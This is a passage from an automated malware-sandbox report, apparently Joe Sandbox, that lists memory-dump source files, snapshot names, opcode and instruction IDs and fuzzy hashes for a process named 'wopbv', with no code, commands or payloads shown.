                                              • Instruction Fuzzy Hash: ECF0ED70A142049FC710CFA8C880BADBBF6FF95314F208299D86897390D7729A42CF44
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2632928727.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_5210000_wopbv.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fc9e6ebbf687ee8cb65861c63c02cbcb3e87f8c3274a77e7352851260f469006
                                              • Instruction ID: 11dad36ae157386e05f1c1697adb0b9459b30a2de09be9ee7381af54a316a6d0
                                              • Opcode Fuzzy Hash: fc9e6ebbf687ee8cb65861c63c02cbcb3e87f8c3274a77e7352851260f469006
                                              • Instruction Fuzzy Hash: 99E01A71928248EFD744DFA8D841BACBBF5EB48204F2085A99C09D3350EA719F46CF55
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2632928727.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_5210000_wopbv.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 39cf53b3db3afd7024ca3cea51c7fef1c8690ec8cf26d312119d148148894d7d
                                              • Instruction ID: d6fc492da083638800a9d63dd34f1de0c27854dfc773f10ed41ff2a694d200ce
                                              • Opcode Fuzzy Hash: 39cf53b3db3afd7024ca3cea51c7fef1c8690ec8cf26d312119d148148894d7d
                                              • Instruction Fuzzy Hash: 2DE02B30D04184AFCB50CFA8C800BADFBF0EF45214F10C2DE9859A7391C2315903CB14
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2632928727.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_5210000_wopbv.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 169feecfe6c866763f5f0d6373a35d559afac568f2a5d511eb31cd99a03e6890
                                              • Instruction ID: 8bf322a20dfbd17b6daab952679d67dfaabe11f29523279bedfaefdade4afb4a
                                              • Opcode Fuzzy Hash: 169feecfe6c866763f5f0d6373a35d559afac568f2a5d511eb31cd99a03e6890
                                              • Instruction Fuzzy Hash: 68E0E574E14208EFCB84DFA8D4407ADBBF4EB88204F10C1A98818A3350D671AA42DF44
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2632928727.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_5210000_wopbv.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d7f7bb49278d0030ffcebdf91f91795db5f867816e1df954add9e578af192c3e
                                              • Instruction ID: 827b2fdde9209a520eccd672a3c534aa28205e9be79cf10c37ba605abe42ef78
                                              • Opcode Fuzzy Hash: d7f7bb49278d0030ffcebdf91f91795db5f867816e1df954add9e578af192c3e
                                              • Instruction Fuzzy Hash: 4EE0DF32801008CFD780FFF0C5057AE37B0EF85300F1409A9800997260EE766E04DB56
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2632928727.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_5210000_wopbv.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4d34fa0e9848e5a0ea96582372943c5aee8742f63ed93a7de926a1dea14a1960
                                              • Instruction ID: 816644a07604f77840ab3c77e6a25a6e2548954108bec7759134c76a9406c017
                                              • Opcode Fuzzy Hash: 4d34fa0e9848e5a0ea96582372943c5aee8742f63ed93a7de926a1dea14a1960
                                              • Instruction Fuzzy Hash: 8EE08C34468204EFC704CFA4E802B3ABBB9EB42204F00819D9C09932A1DFB29D41CB84
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2632928727.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_5210000_wopbv.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d4767b2ba4e2ea53ad6a5f5583e4a0e6eba567de0f56597adf08a40510b22d96
                                              • Instruction ID: 5619601b7c137638ef0744c5351364a321f608b5cdfac0a3b724da50d591b3fe
                                              • Opcode Fuzzy Hash: d4767b2ba4e2ea53ad6a5f5583e4a0e6eba567de0f56597adf08a40510b22d96
                                              • Instruction Fuzzy Hash: 42E0C274498104EBC710DB94DC11BAAB7B8EF46718F3488ED980867350DEB3AD01DB88
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2632928727.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_5210000_wopbv.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 169feecfe6c866763f5f0d6373a35d559afac568f2a5d511eb31cd99a03e6890
                                              • Instruction ID: ce30b6da19da9467713b51be8a92f3b0c8cc6402eb83ab0232e77b8d6cb189e8
                                              • Opcode Fuzzy Hash: 169feecfe6c866763f5f0d6373a35d559afac568f2a5d511eb31cd99a03e6890
                                              • Instruction Fuzzy Hash: 55E0E574E14208EFCB84DFA8D8407ADBBF8FB88204F10C1AA8C1893340D6719E41CF84
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2632928727.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_5210000_wopbv.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3dcd78c34eb4e2b57451bfc99fed5418f0e252b9028a682093c37f9a0a4c3796
                                              • Instruction ID: 52427d32e4f64e1c3c6931f279ee96c88b3f917935c9064fefeb59107b423c59
                                              • Opcode Fuzzy Hash: 3dcd78c34eb4e2b57451bfc99fed5418f0e252b9028a682093c37f9a0a4c3796
                                              • Instruction Fuzzy Hash: 0BE0483171C6524FE716462998656673FF2AB95200B0941AAD945CB255DE68CC01C751
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2618695013.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_cf0000_wopbv.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 69a84a5fe9b5fea0c10b1a7c14e395f49b3b949edba4ad6a37e6c7068f11f4b8
                                              • Instruction ID: 46ee52d0a227dcc4ab3374e4836ae82f678ef0957b9d66f428b135465a3499fc
                                              • Opcode Fuzzy Hash: 69a84a5fe9b5fea0c10b1a7c14e395f49b3b949edba4ad6a37e6c7068f11f4b8
                                              • Instruction Fuzzy Hash: F2E0C235509188DBC741EBA4D842BB8FBBCDB43308F6881AD981897351DA329E03DB4A
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2632928727.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_5210000_wopbv.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a13d5f6c71a7c71f43596571fbc74cc6de8bfe378e695c9f26795513f1835aca
                                              • Instruction ID: e825074dbc5e0399e1271b5e7930c0c4b40a19b7dace04a2b183139b5798689e
                                              • Opcode Fuzzy Hash: a13d5f6c71a7c71f43596571fbc74cc6de8bfe378e695c9f26795513f1835aca
                                              • Instruction Fuzzy Hash: 73E01234D08248EBCB04DFA9D4446ACBBF8EB89204F1081AA8C5853351DA71AA42DF88
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2618695013.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_cf0000_wopbv.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6b5294e76a52ccb54646357a82adfd88feb92aba629edfe359a332e260f53365
                                              • Instruction ID: 8327827bb4ac2879f8eb6c6c2b5613019a8ee9e2d67d010affdc7ca48f112e2a
                                              • Opcode Fuzzy Hash: 6b5294e76a52ccb54646357a82adfd88feb92aba629edfe359a332e260f53365
                                              • Instruction Fuzzy Hash: 93E01271901208DBCB01EFF4D8087AE7BF8EB4A305F0046A5D50993220EFB24E54EB96
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2632928727.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_5210000_wopbv.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d1462c8a73e20b96abf042962c1afc088d2cdc40d24c352d2522dad3961fc16f
                                              • Instruction ID: ac34888fd52e96104ce96d4784b49f6d07e91bac4cf622d73bae4a5de7c0b7c8
                                              • Opcode Fuzzy Hash: d1462c8a73e20b96abf042962c1afc088d2cdc40d24c352d2522dad3961fc16f
                                              • Instruction Fuzzy Hash: 44E0127151110CDBD701EFF5D80579E7BFCEF45200F0555A5950997220EEB24A449B96
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2632928727.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_5210000_wopbv.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ac291b6da5697f014ef7a1c53ec1853a604835ba9e838efea93c7473ad73c14f
                                              • Instruction ID: 53333d9c0f7440afedda1ca923f18d45ddfbe696d08f51f4e29a7f2b19db4c77
                                              • Opcode Fuzzy Hash: ac291b6da5697f014ef7a1c53ec1853a604835ba9e838efea93c7473ad73c14f
                                              • Instruction Fuzzy Hash: 69E0C238918208DBC704DF94E84176DBBB9EF95304F1081D8CC0917340CB71AE42CB89
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2632928727.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_5210000_wopbv.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d5fb85c2726e45cb37d965b802e463606a946b35a9a1e391503592d7f9647012
                                              • Instruction ID: c1c2ee77ef6ddae7ba7d0272b31b3b622a03a842c30a0bac6585f1fca4c7f035
                                              • Opcode Fuzzy Hash: d5fb85c2726e45cb37d965b802e463606a946b35a9a1e391503592d7f9647012
                                              • Instruction Fuzzy Hash: 91E0127191110CEBD701FFF4D804BAF7BF8EF45600F0549A5950997210EE715E049B96
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2618695013.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_cf0000_wopbv.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d864b860b94689f4fd07501b00f4ea70e064d762e6058d76f9c9956f46758d8e
                                              • Instruction ID: d23c7b741be32b0e63d9680fbd11f3cae1b3b178b43f17bc68d9c79651a3e28c
                                              • Opcode Fuzzy Hash: d864b860b94689f4fd07501b00f4ea70e064d762e6058d76f9c9956f46758d8e
                                              • Instruction Fuzzy Hash: C6D02B7B60E3D46FDB524334244928D6F50A553288F1511CADEC7870F3D71184018752
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2618695013.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_cf0000_wopbv.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 524ee45c3bc658afffd00ad49603898d1c16200a7b1d20fc38fd1b2d99f0ca11
                                              • Instruction ID: dacceaa00afd2eb300c5602ed02eb55d677a8dbab4b10691d82894f48c6bb9b4
                                              • Opcode Fuzzy Hash: 524ee45c3bc658afffd00ad49603898d1c16200a7b1d20fc38fd1b2d99f0ca11
                                              • Instruction Fuzzy Hash: 3DD05E3450914CDBC744DB95D800B78F7BCDB46308F1481AD891853351DA729E02DB55
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2632928727.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_5210000_wopbv.jbxd